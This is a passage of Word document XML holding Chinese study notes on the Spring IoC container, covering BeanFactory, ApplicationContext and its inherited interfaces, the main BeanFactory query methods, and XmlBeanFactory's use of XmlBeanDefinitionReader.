          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanDefinition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就消失容器里的水</w:t>
      </w:r>
      <w:r w:rsidR="00387E5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387E5E" w:rsidRPr="00B8147C" w:rsidRDefault="00387E5E" w:rsidP="006354B1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个接口系统使以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ApplicationContext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为核心的。而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>又是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器的最基本接口。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ApplicationContext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它继承了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>体系的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ListableBeanFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AutowireCapableBeanFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HierachicalBeanFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的接口，具备了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanFactory IoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器的基本功能；另一方面，通过继承</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8147C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>MessageSource</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8147C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8147C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ResourceLoad</w:t>
      </w:r>
      <w:r w:rsidR="00B8147C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8147C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F0350" w:rsidRDefault="00387E5E" w:rsidP="00134F57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8147C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8147C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ApplicationEventpublisher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些接口。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ApplicationContext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还设计了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WebApplicationContext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口，而这个接口通过继承</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ThemeSource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个接口来扩充功能。</w:t>
      </w:r>
      <w:r w:rsidR="001E5C4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="001E5C4E" w:rsidRPr="00FF448B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>支持不同的信息源、访问资源、支持应用事件、在</w:t>
      </w:r>
      <w:r w:rsidR="001E5C4E" w:rsidRPr="00FF448B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidR="001E5C4E" w:rsidRPr="00FF448B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>中提供的附加服务</w:t>
      </w:r>
      <w:r w:rsidR="001E5C4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00543B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006354B1" w:rsidRDefault="006354B1" w:rsidP="001E5C4E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口设计了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getBean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，可以获得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器中管理的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006354B1" w:rsidRDefault="006354B1" w:rsidP="006354B1">
      <w:pPr>
        <w:ind w:firstLineChars="650" w:firstLine="1365"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>containsBean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：让用户能够判断是否含有指定名字的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006354B1" w:rsidRDefault="006354B1" w:rsidP="006354B1">
      <w:pPr>
        <w:ind w:firstLineChars="650" w:firstLine="1365"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>isSingleton:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询指定名字的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Singleton</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006354B1" w:rsidRDefault="006354B1" w:rsidP="006354B1">
      <w:pPr>
        <w:ind w:firstLineChars="650" w:firstLine="1365"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>isPrototype</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：查询指定名字的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006354B1" w:rsidRDefault="006354B1" w:rsidP="006354B1">
      <w:pPr>
        <w:ind w:firstLineChars="650" w:firstLine="1365"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>isTypeMatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查询指定了名字的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型是否是特定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008752B5" w:rsidRDefault="008752B5" w:rsidP="006354B1">
      <w:pPr>
        <w:ind w:firstLineChars="650" w:firstLine="1365"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getType:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询指定名字的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008752B5" w:rsidRDefault="008752B5" w:rsidP="008752B5">
      <w:pPr>
        <w:ind w:leftChars="650" w:left="1890" w:hangingChars="250" w:hanging="525"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getAliases:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询指定了名字的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的所有别名，这些别名都是用户在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanDefinition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中定义的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008752B5" w:rsidRDefault="008752B5" w:rsidP="00E71278">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XMLBeanFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它是一个与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也就是说它可以读取以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件定义的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanDefinition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XMLBeanFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XmlBeanDefinitionReader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，有了这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Reader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，那些以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式定义的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanDefinition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就有了处理的地方。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004519AD" w:rsidRDefault="000D1950" w:rsidP="00E71278">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
